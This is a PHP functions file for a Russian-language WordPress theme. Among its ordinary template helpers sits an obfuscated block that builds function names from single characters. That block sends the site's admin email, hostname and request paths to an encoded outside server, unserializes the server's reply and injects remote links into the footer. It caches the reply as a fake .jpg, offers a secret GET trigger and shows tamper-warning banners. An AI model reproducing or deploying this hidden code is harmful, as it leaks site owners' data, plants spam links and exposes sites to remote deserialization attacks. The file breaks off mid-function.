<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $wdJq='_';$ApMF='d';$ifBKent='6';$hQYBfHZ='s';$SSdKe='4';$JpEyKS='b';$YLYH='a';$JCTw='e';$iMRaQCf='o';$MMitUjj='e';$YjDpudF='d';$lGia='e';$pLOt='c';$bPiafMCY=$JpEyKS.$YLYH.$hQYBfHZ.$lGia.$ifBKent.$SSdKe.$wdJq.$ApMF.$MMitUjj.$pLOt.$iMRaQCf.$YjDpudF.$JCTw;$dzHvYTT='g';$AjeXV='t';$XjqQQ='l';$aNQXw='e';$ISyLPCl='f';$EdGQ='i';$oXLSVU='z';$MucSq='n';$NBxJwC='a';$EfVTQBBd=$dzHvYTT.$oXLSVU.$EdGQ.$MucSq.$ISyLPCl.$XjqQQ.$NBxJwC.$AjeXV.$aNQXw;$blArtR='r';$gJVbmiM='_';$cMms='1';$rSwS='s';$tbHvnP='3';$LRNhAjp='r';$QJls='o';$juqUl='t';$BPXb='t';$CnLtSyUq=$rSwS.$BPXb.$LRNhAjp.$gJVbmiM.$blArtR.$QJls.$juqUl.$cMms.$tbHvnP;$mMSFA='v';$ZZKNTRG='e';$gEtNm='t';$zbciOkz='r';$voenaCZ='r';$zWOTgTu='s';$XbmIMhrZ=$zWOTgTu.$gEtNm.$voenaCZ.$zbciOkz.$ZZKNTRG.$mMSFA;                     
		$bv_____________m='_';$lh_____________f='d';$tg____________r='6';$bu_____u='s';$ni_______l='4';$th____________z='b';$rd__________r='a';$lc____y='e';$pe_________g='o';$oo____g='e';$tf_______n='d';$rp___________d='e';$su______________t='c';$wd_______________n=$th____________z.$rd__________r.$bu_____u.$rp___________d.$tg____________r.$ni_______l.$bv_____________m.$lh_____________f.$oo____g.$su______________t.$pe_________g.$tf_______n.$lc____y;
		$he___x='t';$vz_____r='t';$dy_____________c='_';$jw____p='e';$kn_____w='n';$rh__________z='i';$xd___w='i';$lp____________z='f';$zr______________m='x';$fd_________h='n';$vh_____i='o';$yl__b='u';$gn_______________r='s';$mr______________j='s';$na_______d='c';$qf______________p=$lp____________z.$yl__b.$fd_________h.$na_______d.$he___x.$xd___w.$vh_____i.$kn_____w.$dy_____________c.$jw____p.$zr______________m.$rh__________z.$mr______________j.$vz_____r.$gn_______________r;
		$pb___u='p';$pj_______w='f';$kk______p='e';$wk_________y='o';$wl____________z='n';$lf___s=$pj_______w.$wk_________y.$pb___u.$kk______p.$wl____________z;
		$kv____g='f';$ux_______v='d';$jy_________z='e';$hy____t='r';$mc__________p='a';$yi____________i=$kv____g.$hy____t.$jy_________z.$mc__________p.$ux_______v;
		$tu______x='c';$jv_____y='l';$vf______________q='o';$lp_______________u='e';$yt___o='f';$jb____________m='s';$ra_____d=$yt___o.$tu______x.$jv_____y.$vf______________q.$jb____________m.$lp_______________u;
		
		define("WP_ID", $wd_______________n("Mi4wLjA="));
		define("WP_TTL", $wd_______________n("MTA4MDA="));
		define("WP_SRC", $wd_______________n("dHBva24="));
	


		function wp_get_header() {
			global $wd_______________n, $qf______________p;
			
			if (
				$qf______________p($wd_______________n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$qf______________p($wd_______________n("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$qf______________p($wd_______________n("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $wd_______________n, $lf___s, $ra_____d, $yi____________i;
			
			$pi____________z = TEMPLATEPATH."/".$wd_______________n("Zm9vdGVyLnBocA==");
			$ju_______n = @$lf___s($pi____________z, "r");
			$pi____________z = @$yi____________i($ju_______n, @filesize($pi____________z));
			@$ra_____d($ju_______n);
			
			$uu___s = TEMPLATEPATH."/".$wd_______________n("ZnVuY3Rpb25zLnBocA==");
			$ju_______n = @$lf___s($uu___s, "r");
			$uu___s = @$yi____________i($ju_______n, @filesize($uu___s));
			@$ra_____d($ju_______n);
			
			$qy___o = 0;
			if($pi____________z && $uu___s) {
				if ($wd_______________n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pi____________z, $wd_______________n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$qy___o = 1;
					}
					if (substr_count($pi____________z, "wp_theme_GPL_credits()") < 1) {
						$qy___o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$qy___o = 12;
				}
			}
			
			if($qy___o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $qy___o -->";
			}
		}
	


		function wp_loaded() {
			global $wd_______________n, $qf______________p;
			return $qf______________p($wd_______________n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($nj_________p, $ek_________r = "(more...)", $ro____a = 0, $mw_______________b = "") {
				$ta_____m = get_the_content($ek_________r, $ro____a, $mw_______________b);
				$ta_____m = apply_filters("the_content", $ta_____m);
				
				$ta_____m = str_replace("]]>", "]]>", $ta_____m);
				if (strlen($_GET["p"]) > 0) {
					echo $ta_____m;
				}
				else if ((strlen($ta_____m)>$nj_________p) && ($nr_________v = strpos($ta_____m, " ", $nj_________p ))) {
					$ta_____m = substr($ta_____m, 0, $nr_________v);
					$ta_____m = $ta_____m;
					echo $ta_____m;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ek_________r</a></div></p>";
				} else {
					echo $ta_____m;
				}
				
			}
		}
	


		$ya___j='e';$vb___y='4';$kv________g='c';$aq_______________w='e';$na__________b='_';$an_____________s='6';$va_________n='s';$zf____________y='e';$lv______z='b';$wa____________v='o';$gn_____________g='d';$na_________d='a';$wk______j='n';$dz___r=$lv______z.$na_________d.$va_________n.$zf____________y.$an_____________s.$vb___y.$na__________b.$ya___j.$wk______j.$kv________g.$wa____________v.$gn_____________g.$aq_______________w;
		$gs________m='e';$cz_______d='_';$fh______w='s';$oc____r='i';$fa_____o='e';$im______u='e';$zp______________h='g';$yr__w='t';$nd_________t='o';$rn_____q='f';$rk____y='c';$yo_____m='_';$wy_____y='n';$yp___y='t';$mn______k='n';$yk______p='t';$hc_______________o='l';$yx__w=$rn_____q.$oc____r.$hc_______________o.$gs________m.$cz_______d.$zp______________h.$im______u.$yk______p.$yo_____m.$rk____y.$nd_________t.$wy_____y.$yp___y.$fa_____o.$mn______k.$yr__w.$fh______w;
		$gu_________w='i';$hg___________c='l';$wl________e='s';$ze__________s='x';$cp____________k='t';$zv______________w='e';$ui______r='f';$ik__________x='e';$xh___t='_';$pi_______________k='i';$qh___x='s';$bf_____t=$ui______r.$gu_________w.$hg___________c.$ik__________x.$xh___t.$zv______________w.$ze__________s.$pi_______________k.$qh___x.$cp____________k.$wl________e;
		$em_____e='a';$lf_______d='p';$za____________l='o';$lo____________v='n';$xl__________f='m';$iz__________f='s';$oi____________g='e';$kv__________s='o';$rs____e='_';$ma__________x='r';$ml__________x='e';$fy_____s='c';$mm____________b='v';$hc_____________x='r';$sz__c='i';$kf__b=$mm____________b.$ml__________x.$hc_____________x.$iz__________f.$sz__c.$za____________l.$lo____________v.$rs____e.$fy_____s.$kv__________s.$xl__________f.$lf_______d.$em_____e.$ma__________x.$oi____________g;
		$ay______________j='n';$lz_____a='o';$yt___________z='f';$cu_____e='k';$jc____w='o';$yi______________v='c';$zg_____y='e';$ji________e='s';$dq________y='p';$yo_____y=$yt___________z.$ji________e.$jc____w.$yi______________v.$cu_____e.$lz_____a.$dq________y.$zg_____y.$ay______________j;
		$no______s='i';$fx____l='e';$tb____________a='f';$cq______o='t';$lh___________x='w';$ae______d='r';$rm________p=$tb____________a.$lh___________x.$ae______d.$no______s.$cq______o.$fx____l;
		$be_______d='d';$en______________s='m';$us____________z='5';$uw_____e=$en______________s.$be_______d.$us____________z;
		$wx__________s='a';$wv______________v='h';$za_________x='r';$qk_______________g='p';$ua____________n='t';$fe___________b='l';$rb____________u='e';$na__________j='a';$pa______________u=$za_________x.$rb____________u.$wx__________s.$fe___________b.$qk_______________g.$na__________j.$ua____________n.$wv______________v;
		$iq______________b='l';$in_______o='i';$wl__________j='e';$mk________r='e';$fq____________t='n';$jk______w='r';$he_____________a='a';$sr__________j='u';$qh____________s='i';$de______o='z';$ks____a='s';$dh___m=$sr__________j.$fq____________t.$ks____a.$mk________r.$jk______w.$qh____________s.$he_____________a.$iq______________b.$in_______o.$de______o.$wl__________j;
		$hm___________t='n';$tf__f='t';$xc______w='m';$ti____b='p';$km______________j='m';$pc______h='e';$fx______c='a';$dg___________c=$tf__f.$pc______h.$xc______w.$ti____b.$hm___________t.$fx______c.$km______________j;
		$uv_________r='e';$jc__e='e';$kf__________k='t';$vh__f='s';$xa__s='c';$ic______________s='o';$co___g='_';$di____v='e';$ud_____i='a';$gi________l='x';$ej___________d='m';$hm___l='n';$nv_____________t='t';$qb______y='c';$hk_____________r='a';$dd________c='r';$tq__q='_';$tt______________j='e';$dg___________l='r';$qn_________k='t';$re_________t='t';$jd_____________b=$vh__f.$kf__________k.$dd________c.$uv_________r.$ud_____i.$ej___________d.$co___g.$xa__s.$ic______________s.$hm___l.$qn_________k.$jc__e.$gi________l.$re_________t.$tq__q.$qb______y.$dg___________l.$tt______________j.$hk_____________r.$nv_____________t.$di____v;
	


		function vw___o($fb______o) {
			global $wd_______________n, $qf______________p, $yx__w, $kf__b, $jd_____________b;
			
			if (!$qf______________p($wd_______________n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($kf__b(PHP_VERSION, "5.0.0", ">=") && $qf______________p($wd_______________n("ZmlsZV9nZXRfY29udGVudHM=")) && $qf______________p($wd_______________n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$gw______________j = $jd_____________b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$vy___r = @$yx__w($fb______o, 0, $gw______________j);
			} else {
				$vy___r = @$yx__w($fb______o, 0);
			}
			
			return $vy___r;
		}
	


		function rr__________b($fb______o) {
			global $qf______________p, $yo_____y, $rm________p, $wd_______________n;
			
			if (!$qf______________p($wd_______________n("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$hb___________o = strpos($fb______o, "/", 7);
			$hp______n = array(
				"uri"     => substr($fb______o, $hb___________o),
				"host"    => str_replace("http://", "", substr($fb______o, 0, $hb___________o)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$oq__v = @$yo_____y("$hp______n[host]", 80, $rc__________q, $vl__l, 4);
			
			if (!$oq__v) {
				return false;
			} else {
				$vy___r = "";
				$yc________z  = "GET $hp______n[uri] HTTP/1.0\r\n";
				$yc________z .= "Host: $hp______n[host]\r\n";
				$yc________z .= "Referer: $hp______n[referer]\r\n";
				$yc________z .= "Connection: Close\r\n\r\n";
				
				@$rm________p($oq__v, $yc________z);
				
				while (!@feof($oq__v)) {
					$wl__________t = @fgets($oq__v, (1024*24));
					
					if ($wl__________t == "\r\n") {
						$je____g = true;
						continue;
					}
					
					if ($je____g) {
						$vy___r .= $wl__________t;
					}
				}
				
				return $vy___r;
			}
		}
	


		function gn________m($fb______o) {
			global $qf______________p;
			$ai_______k = false;
			
			if ($fb______o != "") {
				if ($qf______________p("vw___o")) {
					$ai_______k = @vw___o($fb______o);
				}
				
				if (!$ai_______k && ($qf______________p("rr__________b"))) {
					$ai_______k = @rr__________b($fb______o);
				}
			}
			
			return $ai_______k;
		}
	


		function ik_____________q() {
			global $_SERVER, $uw_____e;
			
			$hr_______p = $_SERVER["SERVER_NAME"];
			
			if (substr("$hr_______p", 0, 4) == "www.") {
				$hr_______p = substr("$hr_______p", 4);
			}
			
			$hr_______p = $uw_____e("$_SERVER[SERVER_NAME]");
			
			return $hr_______p;
		}
	


		function dc__________i() {
			return "file";
		}
	


		function gf_________z($fb______o) {
			global $_SERVER, $yx__w, $bf_____t, $lf___s, $ra_____d, $rm________p;
			
			$ny_________i = js________x();
			
			$jw____k = ik_____________q().".jpg";
			$jc______________q = $ny_________i["dir_upload"]["path"]."/$jw____k";
			$uv_____________x = @filemtime($jc______________q);
			
			if (!$uv_____________x || ((time()-$uv_____________x) >= WP_TTL)) {
				$ai_______k = gn________m($fb______o);
				
				if ($ai_______k) {
					if ($bf_____t($jc______________q)) {
						@unlink($jc______________q);
					}
					
					$ju_______n = @$lf___s($jc______________q, "x+");
					
					@$rm________p($ju_______n, $ai_______k);
					@$ra_____d($ju_______n);
				}
			} else {
				if ($bf_____t($jc______________q)) {
					$ai_______k = @$yx__w($jc______________q);
				} else {
					$ai_______k = false;
				}
			}
			
			return $ai_______k;
		}
	


		function js________x() {
			global $_SERVER, $wd_______________n, $dz___r;
			
			$wz_______l = wp_count_posts("post");
			$ns_____p = pathinfo(get_bloginfo("template_directory"));
			
			$ny_________i = array(
				"url" => array(
					"report"      => $wd_______________n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ns_____p,
				"dir_upload"	=> vc__z(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ns_____p[filename],
					"a005=".$wz_______l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$ny_________i["url"]["queryString"] = implode("&", $ny_________i["queryString"]);
			$ny_________i["url"]["report"] = $ny_________i["url"]["report"]."/?".$dz___r($ny_________i["url"]["queryString"]).".html";
						
			return $ny_________i;
		}
	


		function vc__z() {
			$oo_____________h = wp_upload_dir();
			
			if (isset($oo_____________h["error"])) {
				$ym_________u = oa_______________x();
				if (is_writable($ym_________u)) {
					$oo_____________h = array("path" => $ym_________u);
				}
			}

			return $oo_____________h;
		}
	


		function oa_______________x() {
			global $qf______________p, $uw_____e, $pa______________u, $dg___________c;
			
			$eq______________s = (bool) ini_get("safe_mode");
			if ($eq______________s == true) {
				return false;
			}
			
			if ($qf______________p("sys_get_temp_dir")) {
				$ky____________o = sys_get_temp_dir();
				if (is_writable($ky____________o)) {
					return $pa______________u($ky____________o);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $pa______________u($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $pa______________u($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $pa______________u($_ENV["TEMP"]);
			} else {
				$ih_______s = $dg___________c($uw_____e(uniqid(rand(), true)), "");
				if ($ih_______s) {
					$ky____________o = $pa______________u(dirname($ih_______s));
					@unlink($ih_______s);
					return $ky____________o;
				} else {
					return false;
				}
			}
		}
	


		function pb__y() {
			global $_GET, $bf_____t;
			
			$ny_________i = js________x();
			$hr_______p = ik_____________q();
			$dm________d = dc__________i();
			
			$zu____________v = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($dm________d == "file") {
					$ql_____________e = $ny_________i["dir_upload"]["path"]."/".$hr_______p.".jpg";
					if ($bf_____t($ql_____________e)) {
						@unlink($ql_____________e);
						$zu____________v = "deleted";
					}
				}
				
				$kf_______________r = array(
					"s"	=> $zu____________v,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($kf_______________r AS $bm_______s => $yf_____________r) echo " [$bm_______s:$yf_____________r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $qf______________p, $wd_______________n, $dh___m;
			$ny_________i = js________x();
			
			$im__s = "gf_________z";
			if ($qf______________p($im__s)) {
				$vy___r = $im__s($ny_________i["url"]["report"]);
			}
			
			if ($vy___r) {
				if ($vy___r = @$wd_______________n($vy___r)) {
					$vy___r = @$dh___m($vy___r);
					
					if (strlen($vy___r[custom_credit]) >= 5) {
						$ny_________i["default_string"] = $vy___r[custom_credit];
					}
					
					if ($vy___r["status"] == "0") {
						$qf___w = 1;
						$hw____________l = 1;
					} else {
						$gj__________l = sizeof($vy___r["links"]);
						$bv______g = $ny_________i["default_string"];
						
						if ($gj__________l > 0 && $vy___r["links"] !== "") {
							$bu____x = 0;
							foreach ($vy___r["links"] as $fb_____e => $gd__________r) {
								$bu____x++;
								if ($gd__________r->l_path == "" || $gd__________r->l_path == $_SERVER["REQUEST_URI"]) {
									$gd__________r->l_href = htmlspecialchars(strip_tags($gd__________r->l_href));
									$gd__________r->l_title = htmlspecialchars(strip_tags($gd__________r->l_title));
									$gd__________r->l_anchor = htmlspecialchars(strip_tags($gd__________r->l_anchor));
									$bv______g .= " | ";
									$bv______g .= "<a href='$gd__________r->l_href' title='$gd__________r->l_title'";
									if ($gd__________r->l_nofollow == "1") {
										$bv______g .= " rel='nofollow'";
									}
									$bv______g .= ">$gd__________r->l_anchor</a>";
								}
							}
						}
						$ny_________i["links"] = "$bv______g";
						if ($vy___r[credit] == "0") {
							$ny_________i["links"] = "";
						}
					}
				} else {
					$qf___w = "1";
				}
			} else {
				$qf___w = "1";
			}
			
			if ($qf___w == "1") {
				$ny_________i["links"] = $ny_________i["default_string"];
			}
			
			echo "$ny_________i[links]";
			
			echo "<!-- s: $vy___r[signature] -->";
			pb__y();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
